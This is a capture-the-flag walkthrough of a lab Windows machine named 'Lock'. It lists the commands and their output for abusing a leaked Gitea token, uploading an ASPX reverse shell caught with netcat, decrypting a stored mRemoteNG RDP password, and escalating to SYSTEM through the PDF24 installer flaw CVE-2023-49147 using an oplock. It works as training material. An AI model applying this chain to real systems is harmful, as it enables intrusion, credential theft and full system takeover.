Starting with the nmap scan we see port Golang running on port 3000 and RDP on port 3389
➜ ~ sudo nmap -sV -sC -T4 -p- 10.129.91.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 15:54 CEST
Stats: 0:03:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.82% done; ETC: 15:57 (0:00:00 remaining)
Nmap scan report for 10.129.91.105
Host is up (0.017s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Lock - Index
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
3000/tcp open http Golang net/http server
|_http-title: Gitea: Git with a cup of tea
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=b374a0b805ad1c3d; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=RqCkHbUQpJxlHHtiSK1ZjZfOFfg6MTc2MDM2MzgwMDgzNTk3MjcwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 13 Oct 2025 13:56:42 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjU
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=5e8db92f6778794c; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=CtXYbcLtNC-xruSv4iXIxj1DtS46MTc2MDM2MzgwMjkxNzQ1OTQwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 13 Oct 2025 13:56:42 GMT
|_ Content-Length: 0
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: LOCK
| NetBIOS_Domain_Name: LOCK
| NetBIOS_Computer_Name: LOCK
| DNS_Domain_Name: Lock
| DNS_Computer_Name: Lock
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-13T13:57:05+00:00
|_ssl-date: 2025-10-13T13:57:45+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2025-10-12T08:41:19
|_Not valid after: 2026-04-13T08:41:19
Gitea
Looking at port 3000 a Gitea app is found version 1.21.3. Gitea is a lightweight Github and self-hosted. Looking at the explore page there's is a ellen.freeman repo which contains a python repos.py script.
Git repositories
From the github website: A repository is the most basic element of GitHub. It's a place where you can store your code, your files, and each file's revision history. Repositories can have multiple collaborators and can be either public or private. The repo tracks history of files as well. So changes done to earlier scripts can be retrieved using git in the terminal or by checking history in the webapp.
In the history we find 2 commits, with an earlier version of the python script that contains the personal access token. With this token we gain access to gitea and the api. For example we could retrieve user details. (Using jq . will order the blob of data)
➜ ~ curl -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f" http://10.129.91.105:3000/api/v1/user | jq .
{
"id": 2,
"login": "ellen.freeman",
"login_name": "",
"full_name": "",
"email": "ellen.freeman@lock.vl",
"avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
"language": "en-US",
"is_admin": false,
"last_login": "2023-12-28T11:38:25-08:00",
"created": "2023-12-27T11:13:10-08:00",
"restricted": false,
"active": true,
"prohibit_login": false,
"location": "",
"website": "",
"description": "",
"visibility": "public",
"followers_count": 0,
"following_count": 0,
"starred_repos_count": 0,
"username": "ellen.freeman"
}Looking what repo's we can find as Ellen. We find the repo website.
➜ ~ curl -H "Authorization: token 43ce39bb0bd6bc489284f2905f033ca467a6362f"
{
"id": 5,
"owner": {
"id": 2,
"login": "ellen.freeman",
"login_name": "",
"full_name": "",
"email": "ellen.freeman@lock.vl",
"avatar_url": "http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74",
"language": "",
"is_admin": false,
"last_login": "0001-01-01T00:00:00Z",
"created": "2023-12-27T11:13:10-08:00",
"restricted": false,
"active": false,
"prohibit_login": false,
"location": "",
"website": "",
"description": "",
"visibility": "public",
"followers_count": 0,
"following_count": 0,
"starred_repos_count": 0,
"username": "ellen.freeman"
},
"name": "website",
"full_name": "ellen.freeman/website",
"description": "",
"empty": false,
"private": true,
"fork": false,
"template": false,
"parent": null,
"mirror": false,
"size": 7370,
"language": "CSS",
"languages_url":
}
]To check whats inside the repo we can clone the repo using the token.
git clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f@10.129.91.105:3000/ellen.freeman/website.git
➜ website git:(main) ls -la
total 56
drwxrwxr-x 4 kali kali 4096 Oct 13 16:40 .
drwx-----x 107 kali kali 20480 Oct 13 16:42 ..
drwxrwxr-x 6 kali kali 4096 Oct 13 16:40 assets
-rw-rw-r-- 1 kali kali 43 Oct 13 16:40 changelog.txt
drwxrwxr-x 7 kali kali 4096 Oct 13 16:40 .git
-rw-rw-r-- 1 kali kali 15708 Oct 13 16:40 index.html
-rw-rw-r-- 1 kali kali 130 Oct 13 16:40 readme.mdI couldn't find any credentials in any of the files in the repo's or history logs. Having access as Ellen we can also upload files.
➜ website git:(main) ✗ git config user.email "test@test.com"
➜ website git:(main) ✗ git config user.name "mcz3n"
➜ website git:(main) ✗ git add test.txt
➜ website git:(main) ✗ git commit -m "test commit"
[main de682b3] test commit
1 file changed, 1 insertion(+)
create mode 100644 test.txt
➜ website git:(main) git push
To http://10.129.91.105:3000/ellen.freeman/website.git
73cdcc1..de682b3 main -> mainSince we're dealing with IIS10 server on port 80 we need an .aspx shell. ASPX pages are served by ASP.NET running under IIS. I found this ASPX reverse shell. https://gist.github.com/qtc-de/19dfc9018685fce1ba2092c8e2382a79. Change the IP and Port to your VM and upload the file.
➜ website git:(main) ✗ git add reverse.aspx
➜ website git:(main) ✗ git commit -m "reverse"
[main 247acfc] reverse
1 file changed, 153 insertions(+)
create mode 100644 reverse.aspx
➜ website git:(main) git push
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 8 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 1.73 KiB | 1.73 MiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.129.91.105:3000/ellen.freeman/website.git
de682b3..247acfc main -> mainThen trigger the file by visiting http://10.129.91.105/reverse.aspx. And we got a reverse shell.
➜ ~ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.204] from (UNKNOWN) [10.129.91.105] 49999
Microsoft Windows [Version 10.0.20348.3932]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
lock\ellen.freeman
c:\windows\system32\inetsrv>mremoteng_decrypt
Inside c:\Users\ellen.freeman\Document there is a config.xml.
c:\Users\ellen.freeman\Documents>type config.xml
type config.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp" ConfVersion="2.6">
<Node Name="RDP/Gale" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="a179606a-a854-48a6-9baa-491d8eb3bddc" Username="Gale.Dekarios" Domain="" Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
</mrng:Connections>What stands out is base64 password from mRemoteNG for Gale.Dekarios. mRemoteNG is an open‑source, tabbed, multi‑protocol remote connections manager. With https://github.com/haseebT/mremoteng-decrypt-1 we can decrypt the password. Password="TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw=="
➜ ~ python3 mremoteng_decrypt.py -s 'TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDX+hUYwBePQ/2qKx+57IeOROXhJxA7CczQzr1nRm89JulQDWPw==' -p mR3m
Password: ty8wnW9qCKDosXo6With the credentials for Gale.Dekarios we can login with RDP session for user flag.
➜ ~ xfreerdp3 /v:10.129.91.105 /u:gale.dekarios /p:ty8wnW9qCKDosXo6 /cert:ignoreRoot flag
What stands out immediately is the presence of PDF-24 on the desktop.
I find a writeup for CVE-2023-49147. https://sploitus.com/exploit?id=PACKETSTORM:176206
- The exploit requires GUI access and a supported browser (e.g. Firefox or Chrome). This attack does not work using a recent version of the Edge browser or Internet Explorer, so use Firefox which is installed.
- PDF24 Creator has to be installed via the MSI file.
The installer file is in a hidden folder c:/_install/pdf24-creator-11.15.1-x64. At the end of the repair process the the sub-process pdf24-PrinterInstall.exe gets called with SYSTEM privileges and performs a write action on the file "C:\Program Files\PDF24\faxPrnInst.log", by setting an oplock the cmd window that gets opened when pdf24-PrinterInstall.exe is executed doesn't close. Oplock can be downloaded here. https://github.com/googleprojectzero/symboliclink-testing-tools/releases/download/v1.0/Release.7z
In short the attack, an action run by SYSTEM opening a CMD window is prevented from closing by OPlock, from that window we open the browser as SYSTEM and then run cmd.exe.
-
OPLock to lock the cmd window.
.\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" -r -
Start the repair procces
msiexec.exe /fa .\pdf24-creator-11.15.1-x64.msi. -
Repair process will spawn new cmd window which won't close because of Oplock.
-
Top bar: click on properties, then open the link next to Use Legacy Console.
-
In the browser, ctrl + o to open a file then type cmd.exe in to bar to open cmd as system.
And we are running as SYSTEM and can get root flag.
